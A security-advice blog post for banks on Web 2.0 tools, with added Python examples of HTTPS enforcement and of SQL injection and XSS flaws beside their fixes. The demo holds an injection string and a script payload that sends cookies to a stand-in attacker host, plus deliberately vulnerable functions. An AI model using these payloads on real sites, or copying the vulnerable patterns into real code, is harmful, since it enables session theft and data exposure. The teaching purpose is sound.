Web 2.0 with security in mind

by admin

As many of you already know, I’ve been speaking to bankers across the country about the web, especially the new technologies coming out of the Web 2.0 movement and how those technologies can help financial institutions connect better, via the Web, with their customers. It has been a lot of fun discussing the possibilities, and some of our clients are beginning to try out and even implement some of these technologies. But one topic that keeps coming back as a question is the security issues related to things like blogs, podcasts, and wikis. Lots of people show interest in trying these technologies but lose their desire when fears of security and privacy start being discussed.

I definitely believe in the power of these technologies to engage your customers in new ways and also to collaborate more productively with your internal staff, but security needs to be addressed when implementing them. Let me try to briefly break down some of the things you need to consider:

Strong Authentication is still key.

For most of these technologies, strong authentication has to be a staple. As always, we recommend complex passwords, changed at least every 45 to 60 days, but let the exposure of the data behind the login be your guide to how often. Rotation is no substitute for strength: a short password, or one reused from another site, is weak no matter how often it is changed. And remember that the admin login of a blog or wiki package is a public-facing target, so the default administrator account should be renamed or disabled before the site goes live.

For sensitive information, SSL is essential.

We utilize a project management system for all our communication with our clients, and we paid more to ensure all pages were properly encrypted and secured from outside access. If it’s just a blog that only carries standard public information, I wouldn’t worry about it, but if it is something like an externally accessible wiki for your FI’s employees, secure it!
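As an added example (not code from the original post, and not a description of the project management system mentioned above), here is a small Python WSGI middleware that enforces the "secure it" advice for something like a staff wiki: plain-HTTP requests are redirected to HTTPS, every HTTPS response carries a Strict-Transport-Security header so browsers stop trying HTTP, and session cookies are marked Secure so they are never sent in the clear. The class name, the stand-in wiki app and the request environments are assumptions constructed for the demo.

```python
from urllib.parse import quote


class ForceHTTPS:
    """WSGI middleware (hypothetical, written for this example) that keeps a
    sensitive application, such as an externally reachable staff wiki, off
    plain HTTP."""

    def __init__(self, app, hsts_max_age=31536000):
        self.app = app
        # HSTS: once a browser has seen this over HTTPS it refuses plain HTTP
        # for the host (and its subdomains) for max-age seconds.
        self.hsts_value = f"max-age={hsts_max_age}; includeSubDomains"

    def __call__(self, environ, start_response):
        if environ.get("wsgi.url_scheme") != "https":
            # Plain HTTP: send the browser to the same resource over HTTPS and
            # return no content, so nothing sensitive leaves in the clear.
            location = self._https_url(environ)
            start_response("301 Moved Permanently",
                           [("Location", location), ("Content-Length", "0")])
            return [b""]

        def hardened_start_response(status, headers, exc_info=None):
            new_headers = []
            for name, value in headers:
                if name.lower() == "set-cookie" and not self._has_attr(value, "secure"):
                    value += "; Secure"  # the cookie must never ride over HTTP
                new_headers.append((name, value))
            # HSTS is only meaningful on HTTPS responses; browsers ignore it on HTTP.
            new_headers.append(("Strict-Transport-Security", self.hsts_value))
            return start_response(status, new_headers, exc_info)

        return self.app(environ, hardened_start_response)

    @staticmethod
    def _https_url(environ):
        # Host name only: the HTTPS listener is assumed to be on port 443.
        host = (environ.get("HTTP_HOST") or environ["SERVER_NAME"]).split(":")[0]
        path = environ.get("SCRIPT_NAME", "") + environ.get("PATH_INFO", "") or "/"
        url = f"https://{host}{quote(path, safe='/')}"
        query = environ.get("QUERY_STRING", "")
        return url + (f"?{query}" if query else "")

    @staticmethod
    def _has_attr(cookie_header, attr):
        # Cookie attributes are ';'-separated after name=value; compare whole
        # attribute names so a cookie called "insecure" is not taken for the flag.
        return any(part.strip().lower() == attr for part in cookie_header.split(";")[1:])


def wiki_app(environ, start_response):
    """Constructed stand-in for the wiki sitting behind the middleware."""
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Set-Cookie", "session=abc123; Path=/; HttpOnly")])
    return [b"internal wiki"]


def call(app, environ):
    """Drive a WSGI app once and return (status, headers as dict, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers

    body = b"".join(app(environ, start_response))
    return captured["status"], dict(captured["headers"]), body


def demo():
    """Run one plain-HTTP and one HTTPS request through the middleware."""
    app = ForceHTTPS(wiki_app)
    base = {"REQUEST_METHOD": "GET", "HTTP_HOST": "wiki.example.com",
            "SERVER_NAME": "wiki.example.com", "PATH_INFO": "/Policies",
            "QUERY_STRING": "rev=3"}
    plain = call(app, {**base, "wsgi.url_scheme": "http", "SERVER_PORT": "80"})
    tls = call(app, {**base, "wsgi.url_scheme": "https", "SERVER_PORT": "443"})
    return {"plain": plain, "tls": tls}


if __name__ == "__main__":
    for name, (status, headers, body) in demo().items():
        print(name, status, headers, body)
```

The redirect on its own is not enough, since the very first request still goes out over HTTP and a hostile network can answer it; that is why the HSTS header and the Secure cookie flag are included, so that after one successful HTTPS visit the browser refuses to speak HTTP to the host or to send the session cookie over it.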

Test these web services for vulnerabilities.

Companies now offer website audits that test whether a site is susceptible to different types of attack (defacement, SQL injection, phishing, cross-site scripting, etc.). Also, Web 2.0 services make heavy use of AJAX, and those background requests are an attack vector too: each AJAX endpoint is an ordinary web request carrying user-controlled input, so it has to validate that input and enforce authorization just like the pages a user sees.
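To make the two injection classes named above concrete, here is an added Python example (not code from the original post or from any product it mentions) that puts a vulnerable blog-search query next to its parameterized form, and a vulnerable comment renderer next to one that escapes its output. The table, rows and attack strings are constructed for the demo; the same two fixes apply unchanged to AJAX endpoints.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data: a blog with one published post and one draft."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO posts VALUES (1, 'Welcome to our blog', 1);
        INSERT INTO posts VALUES (2, 'Q3 rate changes (draft)', 0);
    """)
    return db


def find_post_vulnerable(db, title):
    # The search term is pasted into the statement, so a quote in it rewrites the SQL.
    sql = "SELECT id, title FROM posts WHERE published = 1 AND title = '" + title + "'"
    return db.execute(sql).fetchall()


def find_post_safe(db, title):
    # Parameter binding: the value travels separately and is never parsed as SQL.
    sql = "SELECT id, title FROM posts WHERE published = 1 AND title = ?"
    return db.execute(sql, (title,)).fetchall()


def render_comment_vulnerable(author, body):
    # Raw interpolation: a commenter's markup becomes part of the page for every reader.
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    # Escape at output time so the browser displays the text instead of executing it.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


# Constructed attack strings.
SQLI_PAYLOAD = "x' OR 1=1 --"  # turns the WHERE clause into "always true", exposing the draft
XSS_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def demo():
    db = make_db()
    return {
        "sqli_vulnerable": find_post_vulnerable(db, SQLI_PAYLOAD),
        "sqli_safe": find_post_safe(db, SQLI_PAYLOAD),
        "xss_vulnerable": render_comment_vulnerable("mallory", XSS_PAYLOAD),
        "xss_safe": render_comment_safe("mallory", XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The vulnerable query returns both rows, including the unpublished draft, because the injected `OR 1=1` defeats the `published = 1` filter; the parameterized query returns nothing, since no post is literally titled `x' OR 1=1 --`. The escaped comment reaches readers as visible text rather than as a script that ships their session cookie to a third party.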

You still gotta patch!

If you are running any web software downloaded from the Web (blog engines, wiki packages, forum software), stay on top of the latest revisions, since many releases exist precisely to close security holes, and subscribe to the project’s announcement list so you hear about them. And if going open source (which we’re big fans of), I would recommend software that is used by the masses, not a project maintained by a single developer, because widely used software gets more eyes on its bugs and keeps getting patched.

Again, depending on your use case you don’t necessarily need all of these, but as soon as sensitive data is involved they become more necessary. Do a risk assessment to find out!

:)